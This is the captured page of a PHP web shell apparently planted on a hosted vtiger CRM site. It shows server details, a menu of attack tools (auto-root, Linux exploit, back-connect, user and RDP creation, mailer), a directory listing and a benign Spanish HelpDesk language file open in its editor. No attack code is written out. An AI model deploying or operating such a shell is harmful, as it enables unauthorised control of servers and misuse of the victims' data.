Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
crmleta /
languages /
es_es /
[ HOME SHELL ]
Name
Size
Permission
Action
Settings
[ DIR ]
drwxr-xr-x
custom
[ DIR ]
drwx---r-x
Accounts.php
3.26
KB
-rw-r--r--
Assets.php
1.85
KB
-rw-r--r--
Calendar.php
10.35
KB
-rw-r--r--
Campaigns.php
3.33
KB
-rw-r--r--
Contacts.php
3.38
KB
-rw-r--r--
Documents.php
6.18
KB
-rw-r--r--
EmailTemplate.php
1.42
KB
-rw-r--r--
EmailTemplates.php
1.58
KB
-rw-r--r--
Emails.php
2.86
KB
-rw-r--r--
Events.php
3.41
KB
-rw-r--r--
Faq.php
1.64
KB
-rw-r--r--
Google.php
3.83
KB
-rw-r--r--
HelpDesk.php
4.99
KB
-rw-r--r--
Home.php
2.12
KB
-rw-r--r--
Import.php
6.29
KB
-rw-r--r--
Install.php
4
KB
-rw-r--r--
Invoice.php
2.32
KB
-rw-r--r--
Leads.php
3.42
KB
-rw-r--r--
MailManager.php
10.6
KB
-rw-r--r--
Migration.php
1.91
KB
-rw-r--r--
ModComments.php
1.46
KB
-rw-r--r--
PBXManager.php
1.33
KB
-rw-r--r--
PDFMaker.php
31.18
KB
-rw-r--r--
Portal.php
1.76
KB
-rw-r--r--
Potentials.php
3.6
KB
-rw-r--r--
PriceBooks.php
1.39
KB
-rw-r--r--
Products.php
5.16
KB
-rw-r--r--
Project.php
3.87
KB
-rw-r--r--
ProjectMilestone.php
1.68
KB
-rw-r--r--
ProjectTask.php
2.2
KB
-rw-r--r--
Proposal.php
0
B
-rw----r--
PurchaseOrder.php
3.48
KB
-rw-r--r--
Quotes.php
2
KB
-rw-r--r--
RecycleBin.php
1.83
KB
-rw-r--r--
Reports.php
12.85
KB
-rw-r--r--
Rss.php
1.22
KB
-rw-r--r--
SMSNotifier.php
1.59
KB
-rw-r--r--
SalesOrder.php
2.71
KB
-rw-r--r--
ServiceContracts.php
2.58
KB
-rw-r--r--
Services.php
2.03
KB
-rw-r--r--
Users.php
16.17
KB
-rw-r--r--
VTENotepad.php
724
B
-rw-r--r--
Vendors.php
2.46
KB
-rw-r--r--
Vtiger.php
88.07
KB
-rw-r--r--
Webservices.php
907
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : HelpDesk.php
<?php /*+********************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * Portions created by JPL TSolucio, S.L. are Copyright (C) jpl tsolucio. * All Rights Reserved. * ******************************************************************************** * Language : Español es_es * Version : 6.0.0 * Created Date : 2012-10-25 * Author : JPL TSolucio, S. L. Joe Bordes * Last change : 2013-05-03 * Author : JPL TSolucio, S. L. Joe Bordes ************************************************************************************/ $languageStrings = array( 'HelpDesk' => 'Incidencias', 'SINGLE_HelpDesk' => 'Incidencia', 'LBL_ADD_RECORD' => 'Añadir Incidencia', 'LBL_RECORDS_LIST' => 'Lista de Incidencias', 'LBL_TICKET_INFORMATION' => 'Información de Incidencia', 'LBL_TICKET_RESOLUTION' => 'Resolución de Incidencia', 'Ticket No' => 'Número Incidencia', 'Severity' => 'Urgencia', 'Update History' => 'Histórico de Actualizaciones', 'Hours' => 'Horas', 'Days' => 'Días', 'Title' => 'Título', 'Solution' => 'Solución', 'From Portal' => 'Proviene del Portal', 'Big Problem' => 'Problema Grande', 'Small Problem' => 'Problema Pequeño', 'Other Problem' => 'Otro Problema', 'Normal' => 'Normal', 'High' => 'Alta', 'Urgent' => 'Urgente', 'Minor' => 'Menor', 'Major' => 'Mayor', 'Feature' => 'Característica', 'Critical' => 'Crítica', 'Open' => 'Abierta', 'Wait For Response' => 'Esperando', 'Closed' => 'Cerrada', 'LBL_STATUS' => 'Estado', 'LBL_SEVERITY' => 'Urgencia', 'LBL_CONVERT_FAQ' => 'Convertir en FAQ', 'LBL_RELATED_TO' => 'Relacionado con', 'Related To' => 'En relación con', //added to support i18n in ticket mails 'Hi' => 'Hola', 'Dear' => 'Estimado', 'LBL_PORTAL_BODY_MAILINFO' => 'El Parte ha sido', 'LBL_DETAIL' => ', los detalles son:', 'LBL_REGARDS' => 'Atentamente,', 'LBL_TEAM' => 'Equipo de Soporte Técnico', 'LBL_TICKET_DETAILS' => 'Detalles de Parte', 'LBL_SUBJECT' => 'Asunto : ', 'created' => 'creado', 'replied' => 'respondido', 'reply' => 'Hay una respuesta a', 'customer_portal' => 'en el "Portal del Cliente" en Vtiger', 'link' => 'Utilice el siguiente enlace para ver las respuestas dadas:', 'Thanks' => 'Gracias', 'Support_team' => 'Equipo de Soporte Técnico', 'The comments are' => 'Los comentarios son', 'Ticket Title' => 'Título Incidencia', 'Re' => 'Re :', //this label for customerportal. 'LBL_STATUS_CLOSED' => 'Closed',//Do not convert this label. This is used to check the status. If the status 'Closed' is changed in vtigerCRM server side then you have to change in customerportal language file also. 'LBL_STATUS_UPDATE' => 'Estado de Parte actualizado a', 'LBL_COULDNOT_CLOSED' => 'El Parte no puede ser', 'LBL_CUSTOMER_COMMENTS' => 'EL Cliente ha incluido la siguiente información a su respuesta:', 'LBL_RESPOND' => 'Por favor responde al parte lo más pronto posible.', 'LBL_REGARDS' => 'Saludos Cordiales,', 'LBL_SUPPORT_ADMIN' => 'Atención al Cliente', 'LBL_RESPONDTO_TICKETID' => 'Responde al Nº de Parte', 'LBL_RESPONSE_TO_TICKET_NUMBER' => 'Respuesta al número de entradas', 'LBL_CUSTOMER_PORTAL' => 'en el Portal del Cliente - URGENTE', 'LBL_LOGIN_DETAILS' => 'Sus datos de conexión al Portal de Cliente son:', 'LBL_MAIL_COULDNOT_SENT' => 'No se puede enviar el correo', 'LBL_USERNAME' => 'Usuario :', 'LBL_PASSWORD' => 'Contraseña :', 'LBL_SUBJECT_PORTAL_LOGIN_DETAILS' => 'Datos de Conexión al Portal del Cliente', 'LBL_GIVE_MAILID' => 'Introduzca dirección de email', 'LBL_CHECK_MAILID' => 'Compruebe su dirección de email para el Portal del Cliente', 'LBL_LOGIN_REVOKED' => 'Datos de Usuario no válidos, consulte con su administrador.', 'LBL_MAIL_SENT' => 'Se le ha enviado un correo con los datos de conexión al Portal del Cliente', 'LBL_ALTBODY' => 'Este es el mensaje de correo para los clientes que no soportan HTML', 'HelpDesk ID' => 'Id Incidencia', 'Ticket ID' => 'Nº de Parte', 'LBL_TICKET_NUMBER' => 'Número de entradas', 'Contact Name' => 'Nombre De Contacto', 'LBL_ADD_DOCUMENT' => 'Añadir Documento', 'LBL_OPEN_TICKETS' => 'Tickets Abiertos', 'LBL_CREATE_TICKET' => 'Crear Ticket', );
Close